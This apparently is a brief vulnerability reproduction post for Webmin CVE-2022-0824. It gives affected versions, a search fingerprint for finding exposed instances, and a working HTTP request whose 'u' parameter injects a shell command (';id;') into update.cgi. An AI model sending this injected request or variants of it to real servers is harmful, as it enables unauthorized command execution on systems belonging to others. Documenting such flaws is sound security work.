Webmin Update Cgi Background Remote Command Execution Vulnerability Cve 2022 0824
Webmin Update Cgi Background Remote Command Execution Vulnerability Cve 2022 0824
Webmin update.cgi background remote command execution vulnerability CVE-2022-0824
Vulnerability Description
Webmin is a set of Web-based system management tools for Unix-like operating systems in the Webmin community.
There was a security vulnerability in the version before Webmin 1.990. This vulnerability originated from incorrect access control in the software. Attackers can use this vulnerability to implement remote code execution.
Vulnerability Impact
Webmin < 1.990
Network surveying and mapping
app=”webmin”
Vulnerability reappears
Login page
Send request packet after login
1
2
3
4
5
POST /package-updates/update.cgi HTTP/1.1
Cookie: sid=882af4543067bc6214d2c769325f3b2f
Referer: https:///package-updates/update.cgi?xnavigation=1
mode=new&search=ssh&redir=&redirdesc=&u=0;id;&confirm=Install+Now
This post is licensed under CC BY 4.0 by the author.